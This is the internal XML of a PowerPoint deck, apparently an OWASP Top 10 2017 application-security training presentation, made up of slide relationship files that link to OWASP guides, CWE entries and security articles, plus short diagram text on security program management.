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comments/commentslide1.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.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1"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00" d="100"/>
          <a:sy n="100" d="100"/>
        </p:scale>
        <p:origin x="508" y="-194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comments/commentslide1.xml><?xml version="1.0" encoding="utf-8"?>
<p:cmLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:cm authorId="5" dt="2017-12-05T11:51:57.433" idx="1">
    <p:pos x="10" y="202"/>
    <p:text>Security Risk???</p:text>
    <p:extLst>
      <p:ext uri="{C676402C-5697-4E1C-873F-D02D1690AC5C}">
        <p15:threadingInfo xmlns:p15="http://schemas.microsoft.com/office/powerpoint/2012/main" timeZoneBias="0"/>
      </p:ext>
    </p:extLst>
  </p:cm>
</p:cmLst>
</file>

<file path=ppt/diagrams/_rels/data1.xml.rels>&#65279;<?xml version="1.0" encoding="utf-8" standalone="yes"?><Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/SAMM_-_Design_Review_-_1" TargetMode="External" /><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/SAMM_-_Education_&amp;_Guidance_-_1" TargetMode="External" /><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/OWASP_Security_Knowledge_Framework" TargetMode="External" /><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/SAMM_-_Threat_Assessment_-_1" TargetMode="External" /><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/SAMM_-_Strategy_&amp;_Metrics_-_3" TargetMode="External" /><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/SAMM_-_Policy_&amp;_Compliance_-_2" TargetMode="External" /><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/SAMM_-_Strategy_&amp;_Metrics_-_2" TargetMode="External" /><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/SAMM_-_Verification" TargetMode="External" /><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/SAMM_-_Education_&amp;_Guidance_-_3" TargetMode="External" /><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/SAMM_-_Construction" TargetMode="External" /><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/SAMM_-_Strategy_&amp;_Metrics_-_1" TargetMode="External" /><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/SAMM_-_Security_Testing_-_1" TargetMode="External" /><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/SAMM_-_Education_&amp;_Guidance_-_2" TargetMode="External" /><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/SAMM_-_Code_Review_-_1" TargetMode="External" /><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/OWASP_Risk_Rating_Methodology" TargetMode="External" /></Relationships>
</file>

<file path=ppt/diagrams/_rels/data2.xml.rels>&#65279;<?xml version="1.0" encoding="utf-8" standalone="yes"?><Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/OWASP_Secure_Software_Contract_Annex" TargetMode="External" /></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Larger organizations should consider implementing a Configuration Management Database (CMDB) for this purpose</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="ru-RU" dirty="1" noProof="0"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Identify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of your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should be driven in part by privacy laws and other regulations relevant to the data asset being protected.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Activities include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Manage with metrics.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Drive improvement and funding decisions based on the metrics and analysis data captured.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Conduct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Add the results to your CMDB.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drive adoption.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dirty="1" sz="900">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
          </a:br>
          <a:r>
            <a:rPr lang="ru-RU" dirty="1"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with</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br>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All other data should be securely wiped.</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ru-RU" dirty="1" noProof="0" sz="90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dirty="1" noProof="0" sz="90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dirty="1" noProof="0" sz="900">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
              <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>.</a:t>
          </a:r>
          <a:br>
            <a:rPr lang="ru-RU" dirty="1" noProof="0" sz="900">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
              <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
          </a:br>
          <a:r>
            <a:rPr lang="ru-RU" dirty="1" b="1" noProof="0" sz="900">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
              <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>Note:</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="ru-RU" dirty="1" b="1" noProof="0" sz="900">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
              <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t> </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="ru-RU" dirty="1" b="0" sz="90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dirty="1" noProof="0" sz="90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This should be supported by security specialists.</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3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://creativecommons.org/licenses/by-sa/4.0/" TargetMode="External" /><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.png" /><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout3.xml" /><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image3.png" /><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://creativecommons.org/licenses/by-sa/4.0/" TargetMode="External" /><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2.png" /><Relationship Id="commentslide1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/comments" Target="../comments/commentslide1.xml" /></Relationships>
</file>

<file path=ppt/slides/_rels/slide10.xml.rels>&#65279;<?xml version="1.0" encoding="utf-8" standalone="yes"?><Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/OWASP_Proactive_Controls#7:_Protect_Data" TargetMode="External" /><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/OWASP_Secure_Headers_Project" TargetMode="External" /><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cwe.mitre.org/data/definitions/311.html" TargetMode="External" /><Relationship Id="rId26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://wikipedia.org/wiki/PBKDF2" TargetMode="External" /><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide9.xml" /><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cwe.mitre.org/data/definitions/326.html" TargetMode="External" /><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/ASVS" TargetMode="External" /><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Cryptographic_Storage_Cheat_Sheet" TargetMode="External" /><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cwe.mitre.org/data/definitions/310.html" TargetMode="External" /><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://wikipedia.org/wiki/Bcrypt" TargetMode="External" /><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml" /><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.owasp.org/index.php/Command_Injection" TargetMode="External" /><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cwe.mitre.org/data/definitions/319.html" TargetMode="External" /><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag8.xml" /><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/ASVS_V10_Communications" TargetMode="External" /><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Password_Storage_Cheat_Sheet" TargetMode="External" /><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://wikipedia.org/wiki/Scrypt" TargetMode="External" /><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/ASVS_V9_Data_Protection" TargetMode="External" /><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Testing_for_weak_Cryptography" TargetMode="External" /><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.cryptolux.org/index.php/Argon2" TargetMode="External" /><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/User_Privacy_Protection_Cheat_Sheet" TargetMode="External" /><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cwe.mitre.org/data/definitions/312.html" TargetMode="External" /><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/ASVS_V7_Cryptography" TargetMode="External" /><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Transport_Layer_Protection_Cheat_Sheet" TargetMode="External" /><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/HTTP_Strict_Transport_Security_Cheat_Sheet" TargetMode="External" /><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/359.html" TargetMode="External" /></Relationships>
</file>

<file path=ppt/slides/_rels/slide11.xml.rels>&#65279;<?xml version="1.0" encoding="utf-8" standalone="yes"?><Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Testing_for_XML_Injection_(OTG-INPVAL-008)" TargetMode="External" /><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://blog.ioactive.com/2014/11/die-laughing-from-billion-laughs.html" TargetMode="External" /><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide10.xml" /><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Category:OWASP_Application_Security_Verification_Standard_Project#tab=Home" TargetMode="External" /><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/611.html" TargetMode="External" /><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Category:Vulnerability_Scanning_Tools" TargetMode="External" /><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml" /><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Source_Code_Analysis_Tools" TargetMode="External" /><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag9.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www.owasp.org/index.php/Command_Injection" TargetMode="External" /><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/XML_External_Entity_(XXE)_Prevention_Cheat_Sheet" TargetMode="External" /><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://web-in-security.blogspot.tw/2014/11/detecting-and-exploiting-xxe-in-saml.html" TargetMode="External" /><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/XML_Security_Cheat_Sheet" TargetMode="External" /><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.w3schools.com/xml/xml_dtd_intro.asp" TargetMode="External" /><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/XML_External_Entity_(XXE)_Processing" TargetMode="External" /><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://secretsofappsecurity.blogspot.tw/2017/01/saml-security-xml-external-entity-attack.html" TargetMode="External" /></Relationships>
</file>

<file path=ppt/slides/_rels/slide12.xml.rels>&#65279;<?xml version="1.0" encoding="utf-8" standalone="yes"?><Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Access_Control_Cheat_Sheet" TargetMode="External" /><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://portswigger.net/blog/exploiting-cors-misconfigurations-for-bitcoins-and-bounties" TargetMode="External" /><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide11.xml" /><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Testing_for_Authorization" TargetMode="External" /><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/639.html" TargetMode="External" /><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml" /><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag10.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285.html" TargetMode="External" /><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/OWASP_Proactive_Controls#6:_Implement_Access_Controls" TargetMode="External" /><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Category:Vulnerability_Scanning_Tools" TargetMode="External" /><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/284.html" TargetMode="External" /><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.owasp.org/index.php/Top_10_2007-Insecure_Cryptographic_Storage" TargetMode="External" /><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/22.html" TargetMode="External" /><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Source_Code_Analysis_Tools" TargetMode="External" /></Relationships>
</file>

<file path=ppt/slides/_rels/slide13.xml.rels>&#65279;<?xml version="1.0" encoding="utf-8" standalone="yes"?><Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/OWASP_Secure_Headers_Project" TargetMode="External" /><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/388.html" TargetMode="External" /><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide12.xml" /><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Testing_for_Error_Code_(OWASP-IG-006)" TargetMode="External" /><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/16.html" TargetMode="External" /><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml" /><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag11.xml" /><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Testing_for_configuration_management" TargetMode="External" /><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/2.html" TargetMode="External" /><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.owasp.org/index.php/Top_10_2007-Insecure_Cryptographic_Storage" TargetMode="External" /><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blog.websecurify.com/2017/10/aws-s3-bucket-discovery.html" TargetMode="External" /><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://csrc.nist.gov/publications/detail/sp/800-123/final" TargetMode="External" /><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide16.xml" /><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/ASVS_V19_Configuration" TargetMode="External" /><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.cisecurity.org/cis-benchmarks/" TargetMode="External" /></Relationships>
</file>

<file path=ppt/slides/_rels/slide14.xml.rels>&#65279;<?xml version="1.0" encoding="utf-8" standalone="yes"?><Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Testing_for_DOM-based_Cross_site_scripting_(OTG-CLIENT-001)" TargetMode="External" /><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.owasp.org/index.php/Command_Injection" TargetMode="External" /><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide13.xml" /><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Testing_for_Stored_Cross_site_scripting_(OTG-INPVAL-002)" TargetMode="External" /><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/OWASP_Java_Encoder_Project" TargetMode="External" /><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml" /><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://developer.mozilla.org/en-US/docs/Web/HTTP/CSP" TargetMode="External" /><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag12.xml" /><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Testing_for_Reflected_Cross_site_scripting_(OTG-INPVAL-001)" TargetMode="External" /><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet" TargetMode="External" /><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Category:OWASP_Application_Security_Verification_Standard_Project" TargetMode="External" /><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://portswigger.net/kb/issues/00200308_clientsidetemplateinjection" TargetMode="External" /><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/DOM_based_XSS_Prevention_Cheat_Sheet" TargetMode="External" /><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/OWASP_Proactive_Controls#tab=OWASP_Proactive_Controls_2016" TargetMode="External" /><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet" TargetMode="External" /><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/79.html" TargetMode="External" /></Relationships>
</file>

<file path=ppt/slides/_rels/slide15.xml.rels>&#65279;<?xml version="1.0" encoding="utf-8" standalone="yes"?><Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://speakerdeck.com/pwntester/friday-the-13th-json-attacks" TargetMode="External" /><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://frohoff.github.io/appseccali-marshalling-pickles/" TargetMode="External" /><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide14.xml" /><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://speakerdeck.com/pwntester/surviving-the-java-deserialization-apocalypse" TargetMode="External" /><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/mbechler/marshalsec" TargetMode="External" /><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml" /><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag13.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502.html" TargetMode="External" /><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/OWASP_Proactive_Controls#4:_Validate_All_Inputs"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Deserialization_Cheat_Sheet" TargetMode="External" /><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.slideshare.net/cschneider4711/surviving-the-java-deserialization-apocalypse-owasp-appseceu-2016" TargetMode="External" /><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://owasp.blogspot.com/2017/08/owasp-top-10-2017-project-update.html" TargetMode="External" /></Relationships>
</file>

<file path=ppt/slides/_rels/slide16.xml.rels>&#65279;<?xml version="1.0" encoding="utf-8" standalone="yes"?><Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide13.xml" /><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.aspectsecurity.com/research-presentations/the-unfortunate-reality-of-insecure-libraries" TargetMode="External" /><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://rubysec.com/" TargetMode="External" /><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide15.xml" /><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Virtual_Patching_Best_Practices#What_is_a_Virtual_Patch.3F" TargetMode="External" /><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/Heartbleed" TargetMode="External" /><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Virtual_Patching_Best_Practices" TargetMode="External" /><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nodesecurity.io/advisories" TargetMode="External" /><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml" /><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/retirejs/retire.js/" TargetMode="External" /><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cve.mitre.org/" TargetMode="External" /><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag14.xml" /><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.shodan.io/report/89bnfUyJ" TargetMode="External" /><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Map_Application_Architecture_(OTG-INFO-010)" TargetMode="External" /><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/Internet_of_things" TargetMode="External" /><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/" TargetMode="External" /><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/OWASP_Dependency_Check" TargetMode="External" /><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.mojohaus.org/versions-maven-plugin/" TargetMode="External" /><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5638" TargetMode="External" /><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/ASVS_V1_Architecture" TargetMode="External" /><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.cvedetails.com/version-search.php" TargetMode="External" /></Relationships>
</file>

